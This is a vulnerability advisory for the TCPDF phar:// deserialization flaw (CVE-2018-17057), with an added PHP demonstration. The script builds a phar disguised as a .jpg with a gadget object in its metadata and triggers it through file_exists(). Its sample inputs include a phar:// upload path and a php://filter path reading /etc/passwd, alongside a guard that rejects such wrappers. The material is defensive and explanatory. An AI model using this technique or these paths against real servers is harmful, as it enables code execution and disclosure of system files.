CVE-2018-17057: TCPDF vulnerable to attackers triggering deserialization of arbitrary data
CVSS Score: 9.8 (CVSS 3.0)
Basic Information
CVE ID: CVE-2018-17057
GHSA ID:
EPSS Score: 0.97141%
CWE:
Published: 10/6/2022
Updated: 2/5/2024
KEV Status: No
Technology: PHP
Technical Details
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| tecnickcom/tcpdf | composer | < 6.2.22 | 6.2.22 |
| fooman/tcpdf | composer | < 6.2.22 | 6.2.22 |
| la-haute-societe/tcpdf | composer | < 6.2.22 | 6.2.22 |
| spoonity/tcpdf | composer | < 6.2.22 | 6.2.22 |
Vulnerability Intelligence
Miggo AI
Root Cause Analysis
The root cause is that TCPDF passed user-controlled paths straight to PHP's filesystem functions (file_exists, file_get_contents) without restricting which stream wrapper the path could name. In PHP these functions, not only include or unserialize, accept a phar:// path, and when an archive is opened through that wrapper the interpreter unserializes the metadata stored in the archive manifest. That manifest is attacker-controlled, the file only needs a valid phar structure rather than a .phar extension, and the resulting __wakeup/__destruct calls on whatever classes the application autoloads give the usual PHP object-injection primitive, even though TCPDF itself never calls unserialize. Code paths such as addTTFfont (font files) and _parsejpeg (image files) ran these checks on paths an application may derive from user input, so a value of the form phar://path/to/uploaded.jpg/x was enough to trigger deserialization. Exploitation therefore requires an attacker to get a phar-formatted file onto the server (an upload endpoint is the typical route) and to control the path TCPDF receives, plus a usable gadget chain in loadable code. The fix in 6.2.22 introduced TCPDF_STATIC::file_exists, which accepts plain paths and http/https URLs and returns false for any other scheme, so the phar:// wrapper is never reached; the explicit protocol restriction in that patch, together with the CVE description naming the phar wrapper, is why this root-cause assessment is rated high confidence.
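As an added illustration (my own code, not TCPDF's and not the 6.2.22 patch), the PHP script below contrasts the unguarded file_exists() call with a guard in the spirit of TCPDF_STATIC::file_exists. The Gadget class, vulnerable_exists(), classify_path(), safe_exists() and the sample paths are constructed for this example. The live phar part needs phar.readonly=0 (php -d phar.readonly=0 poc.php), and __wakeup() fires on PHP 7.x only: PHP 8.0 stopped unserializing phar metadata implicitly when an archive is touched through the stream wrapper, so there the script only shows the guard's verdict.

```php
<?php
declare(strict_types=1);

// Added illustration, not TCPDF's code. Shows (1) why a bare file_exists() on an
// attacker-controlled path reaches the phar:// wrapper and (2) a guard in the
// spirit of the 6.2.22 fix. All names below are hypothetical.

// Constructed gadget: stands in for any autoloadable class in the application
// whose __wakeup()/__destruct() has a side effect an attacker can use.
class Gadget
{
    public $cmd = 'id';

    public function __wakeup()
    {
        echo "[!] Gadget::__wakeup fired, cmd={$this->cmd}\n";
    }
}

// Vulnerable pattern: the path reaches PHP's stream layer unfiltered, so any
// registered wrapper (phar://, php://, data://, ...) is honoured.
function vulnerable_exists(string $path): bool
{
    return @file_exists($path);
}

// Hardened pattern, modelled on the fix's "plain path or http(s), nothing
// else" rule. Returns 'local', 'remote' or 'rejected' so the caller decides
// how to fetch. Scheme matching is case-insensitive because wrapper names are.
function classify_path(string $path): string
{
    if (preg_match('#^https?://#i', $path) === 1) {
        return 'remote';
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path) === 1) {
        return 'rejected'; // unsupported stream wrapper, e.g. phar://
    }
    return 'local';
}

function safe_exists(string $path): bool
{
    return classify_path($path) === 'local' && @file_exists($path);
}

// 1. Static check of representative inputs (constructed samples).
$samples = [
    '/usr/share/fonts/DejaVuSans.ttf',
    'https://example.org/font.ttf',
    'phar:///var/www/uploads/avatar.jpg/x',
    'PHAR:///var/www/uploads/avatar.jpg/x',
    'php://filter/read=convert.base64-encode/resource=/etc/passwd',
];
foreach ($samples as $s) {
    printf("%-62s => %s\n", $s, classify_path($s));
}

// 2. Live demonstration: build a phar whose manifest metadata is a serialized
//    Gadget, rename it to .jpg, then touch it through the wrapper.
if (Phar::canWrite()) {
    $tmp  = sys_get_temp_dir();
    $phar = $tmp . '/poc.phar';   // Phar requires a .phar name at build time
    $jpg  = $tmp . '/avatar.jpg';
    @unlink($phar);
    @unlink($jpg);

    $p = new Phar($phar);
    $p->startBuffering();
    $p->addFromString('x', 'x');                 // any one entry is enough
    $p->setStub('<?php __HALT_COMPILER(); ?>');  // minimal valid stub
    $p->setMetadata(new Gadget());               // serialized into the manifest
    $p->stopBuffering();
    unset($p);

    rename($phar, $jpg); // the wrapper keys on the manifest, not the extension

    $attackerPath = 'phar://' . $jpg . '/x';
    echo "vulnerable_exists: ";
    var_dump(vulnerable_exists($attackerPath)); // PHP 7.x: __wakeup runs first
    echo "safe_exists:       ";
    var_dump(safe_exists($attackerPath));       // false, wrapper never reached

    unlink($jpg);
}
```

The classify_path() split is deliberate: the original fix folds "is this a URL" into the same function, but separating the verdict from the fetch makes it obvious that the only path that ever reaches file_exists() is one with no scheme at all.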